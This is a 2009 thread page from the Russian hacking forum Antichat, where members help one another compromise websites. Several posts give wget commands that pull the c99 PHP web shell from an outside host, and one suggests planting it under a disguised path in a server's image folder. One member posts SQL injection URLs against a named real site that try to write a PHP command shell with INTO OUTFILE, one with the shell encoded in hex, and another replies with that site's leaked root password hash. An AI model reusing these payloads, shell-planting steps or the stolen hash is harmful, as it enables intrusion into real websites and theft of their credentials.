ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #10481  
Старый 01.12.2009, 00:53
Grey
AMA - Level 2
Регистрация: 10.06.2006
Сообщений: 1,113
Провел на форуме:
17668503

Репутация: 5826


По умолчанию

Цитата:
Сообщение от RulleR  
wget -o /papka/na/servere/shell.php http://shell.in/shell.txt
Сразу видно ты команду ниразу не юзал:

Код:
wget http://ya.ru/index.html -o 1.txt - поместит лог работы в 1.txt
wget http://ya.ru/index.html -O 1.txt - сохранит файл в 1.txt
 
Ответить с цитированием

  #10482  
Старый 01.12.2009, 01:19
547
Участник форума
Регистрация: 11.10.2009
Сообщений: 116
Провел на форуме:
472147

Репутация: 211
По умолчанию

Цитата:
Сообщение от Grey  
Сразу видно ты команду ниразу не юзал:

Код:
wget http://ya.ru/index.html -o 1.txt - поместит лог работы в 1.txt
wget http://ya.ru/index.html -O 1.txt - сохранит файл в 1.txt
правильно?
wget http://site.ru/shell.txt -O http://www.motorama.be/shell.php

где www.motorama.be/shell.php сайт куда надо загрузить шелл...

а wget http://site.ru/shell.txt

сайт где лежит код шелла...

Последний раз редактировалось 547; 01.12.2009 в 01:21..
 
Ответить с цитированием

  #10483  
Старый 01.12.2009, 01:27
bons
Участник форума
Регистрация: 20.12.2007
Сообщений: 295
Провел на форуме:
1777055

Репутация: 347
По умолчанию

Цитата:
Сообщение от 547  
правильно?
wget http://site.ru/shell.txt -O http://www.motorama.be/shell.php

где www.motorama.be/shell.php сайт куда надо загрузить шелл...

а wget http://site.ru/shell.txt

сайт где лежит код шелла...
неправильно.
для того чтобы это было правильным, у программы wget должны были бы быть следующие возможности:
- определяет что за веб-сервер установлен
- ищет его конфиги
- находит в конфигах полный путь к директории сервера
- вычисляет куда, наконец, сохранить этот злополучный shell.php
- сохраняет его туда
Вам не кажется что это многовато для простой утилиты?
 
Ответить с цитированием

  #10484  
Старый 01.12.2009, 01:39
mailbrush
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
Провел на форуме:
6075534

Репутация: 2731


Отправить сообщение для mailbrush с помощью ICQ
По умолчанию

Цитата:
Сообщение от bons  
неправильно.
для того чтобы это было правильным, у программы wget должны были бы быть следующие возможности:
- определяет что за веб-сервер установлен
- ищет его конфиги
- находит в конфигах полный путь к директории сервера
- вычисляет куда, наконец, сохранить этот злополучный shell.php
- сохраняет его туда
Вам не кажется что это многовато для простой утилиты?
Мда уж... И зачем умничать? Это по-детски как-то. Честно, как ребенок говоришь...

547, я тебе уже в личке объяснял, еще раз напишу полный и рабочий пример использования wget
Код:
wget http://madnet.name/files/download/9_c99madshell.php -O c99madshell.php
В даном случае wget скачает файл, который находится по адресу http://madnet.name/files/download/9_c99madshell.php в файл c99madshell.php, который будет находится в текущей директории, т.е. в директории с которой был запущен wget. Если необходимо загрузить в отличную от текущей директорию, достаточно вместо c99madshell.php написать полный путь к файлу, н.п.
Код:
/var/www/images/smiles/smile.php
А вообще, читай
http://linux.about.com/od/commands/l/blcmdl1_wget.htm
 
Ответить с цитированием

  #10485  
Старый 01.12.2009, 13:50
p.r0phe.t
Познающий
Регистрация: 22.08.2009
Сообщений: 98
Провел на форуме:
224604

Репутация: 19
По умолчанию

Подскажите файлохранлище с ПРЯМОЙ ссылкой на файл.
 
Ответить с цитированием

  #10486  
Старый 01.12.2009, 14:00
Bb0y
Участник форума
Регистрация: 30.10.2009
Сообщений: 103
Провел на форуме:
736224

Репутация: 388
Отправить сообщение для Bb0y с помощью ICQ Отправить сообщение для Bb0y с помощью Yahoo
По умолчанию

Для меня лучший обменник - filehoster.Ru.
а так советую зарегать хост к примеру на юкозе, и туда лить файлы
 
Ответить с цитированием

  #10487  
Старый 01.12.2009, 14:03
p.r0phe.t
Познающий
Регистрация: 22.08.2009
Сообщений: 98
Провел на форуме:
224604

Репутация: 19
По умолчанию

Цитата:
Сообщение от Bb0y  
Для меня лучший обменник - filehoster.Ru.
а так советую зарегать хост к примеру на юкозе, и туда лить файлы
мне нужно чтобы wget'ом качнуть потом можно было,прямая ссылка как я написал,без всяких подтверждений
 
Ответить с цитированием

  #10488  
Старый 01.12.2009, 14:14
Pashkela
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме:
9220514

Репутация: 3338


Отправить сообщение для Pashkela с помощью ICQ
По умолчанию

регить сайт на народе - 1 мин.
 
Ответить с цитированием

  #10489  
Старый 01.12.2009, 14:18
wkar
Познающий
Регистрация: 18.10.2009
Сообщений: 80
Провел на форуме:
1180165

Репутация: 11
По умолчанию

Здравствуйте.
1.Подскажите пожалуйста, есть сайт с инъекцией http://www.terratour.ru/ru/pages.php?pg=-9+UNION+SELECT+1,2,3,4,5,6--
Как можно залить шелл?

http://www.terratour.ru/ru/pages.php?pg=-9+UNION+SELECT+1,'<? php system($_GET[cmd]); ?>',3,4,5,6 INTO OUTFILE 'D:/www/shell.php'-- ничего не получается

http://www.terratour.ru/ru/pages.php?pg=-9+UNION+SELECT+1,0x3c3f207068702073797374656d2 8245f4745545b636d645d293b203f3e,3,4,5,6 INTO OUTFILE 'D:/www/shell.php' так же них нету
 
Ответить с цитированием

  #10490  
Старый 01.12.2009, 15:10
p.r0phe.t
Познающий
Регистрация: 22.08.2009
Сообщений: 98
Провел на форуме:
224604

Репутация: 19
По умолчанию

Цитата:
Сообщение от wkar  
Здравствуйте.
1.Подскажите пожалуйста, есть сайт с инъекцией http://www.terratour.ru/ru/pages.php?pg=-9+UNION+SELECT+1,2,3,4,5,6--
Как можно залить шелл?

http://www.terratour.ru/ru/pages.php?pg=-9+UNION+SELECT+1,'<? php system($_GET[cmd]); ?>',3,4,5,6 INTO OUTFILE 'D:/www/shell.php'-- ничего не получается

http://www.terratour.ru/ru/pages.php?pg=-9+UNION+SELECT+1,0x3c3f207068702073797374656d2 8245f4745545b636d645d293b203f3e,3,4,5,6 INTO OUTFILE 'D:/www/shell.php' так же них нету
кавычки экранируются. Облом с аутфайлом в общем.
Можешь хеш расшифровать к юзеру рут =)
root:C705FA72189D628A3657C885B0668778976F72E4

Последний раз редактировалось p.r0phe.t; 01.12.2009 в 15:27..
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Форумы 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ